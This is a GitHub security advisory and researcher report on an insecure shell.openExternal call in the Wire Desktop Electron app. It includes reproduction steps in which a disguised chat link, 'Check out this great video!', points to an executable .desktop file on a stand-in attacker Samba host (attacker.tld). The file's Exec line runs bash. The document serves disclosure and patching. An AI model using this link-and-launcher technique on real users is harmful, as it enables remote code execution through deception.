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Insecure use of shell.openExternal

franziskuskiefer published GHSA-5gpx-9976-ggpm Oct 9, 2020


No package listed

Affected versions

<= 3.19.x

Patched versions



shell.openExternal was used without checking the URL.


This vulnerability allows an attacker to execute code on the victims machine.
The victim has to interact with the link though and sees the URL that is opened.
We therefore rate this vulnerability high.


The issue was patched by implementing a helper function which checks if the URL's protocol is common. If it is common, the URL will be opened externally. If not, the URL will not be opened and a warning appears for the user informing them that a probably insecure URL was blocked from being executed.



This issue was reported by Benjamin Altpeter.

For more information

If you have any questions or comments about this advisory:

Details and Report

I have found that the Wire Desktop Electron app opens new windows
using shell.openExternal(). This allows an attacker to gain remote
code execution on a user's computer if they middleclick a malicious

The attack presented here works on Xubuntu 20.04. Similar attacks will
work on other operating systems.

Steps to reproduce:

  1. Install Wire Desktop on Xubuntu 20.04.

  2. Start a conversation.

  3. Setup a public Samba server (at attacker.tld in this example) and
    create a public share (named public here). In this share, publish
    the following file as pwn.desktop and make it executable:

    [Desktop Entry]
    Exec=bash -c "(mate-calc &); xmessage \"Hello from Electron.\""
  4. From another account in the same conversation, send the following
    message with the corresponding values replaced: [Check out this great video!](smb://attacker.tld/public/pwn.desktop)

  5. Middleclick the link and (if necessary) confirm starting the
    untrusted launcher.

  6. Notice the calculator and message box appearing, confirming remote
    code execution.

I have attached a video of the attack to the report.

Affected version: Tested using the latest version 3.18.2925 (from:

Cause and suggested fixes:

The problem is in the handler for the new-window event:

main.webContents.on('new-window', async (event, url) => {
// Ensure the link does not come from a webview
if (typeof (event as any).sender.viewInstanceId !== 'undefined') {
logger.log('New window was created from a webview, aborting.');
await shell.openExternal(url);

All URLs are passed to shell.openExternal(). Instead, I strongly
recommend switching to an allowlist that only allows a selection of
protocols (http://, https:// and mailto: will probably be
enough). Note that blocking smb: isn't enough as this is just one
example of a protocol that can be used for exploitation.


  • The attack can be triggered remotely by an attacker by simply
    sending a message to a conversation.
  • The particular attack presented here requires user interaction. The
    user has to middleclick the link (which is obfuscated) and potentially
    confirm launching the executable. The last part may not be necessary
    depending on the particular attack vector and system the user runs.
  • This particular presented attack only works on certain Linux
    distributions. However, this is only due to the particular attack
    payload used (a Linux .desktop file accessed over Samba). Similar
    payloads will also work on other Linux distributions as well as
    Windows and macOS. The Electron documentation explicitly warns against
    using shell.openExternal() with untrusted content:
  • If the attack is executed successfully, the attacker can run
    arbitrary code on the user's system.
  • Patching the problem is simple and doesn't break any legitimate use
    cases that I can think of.






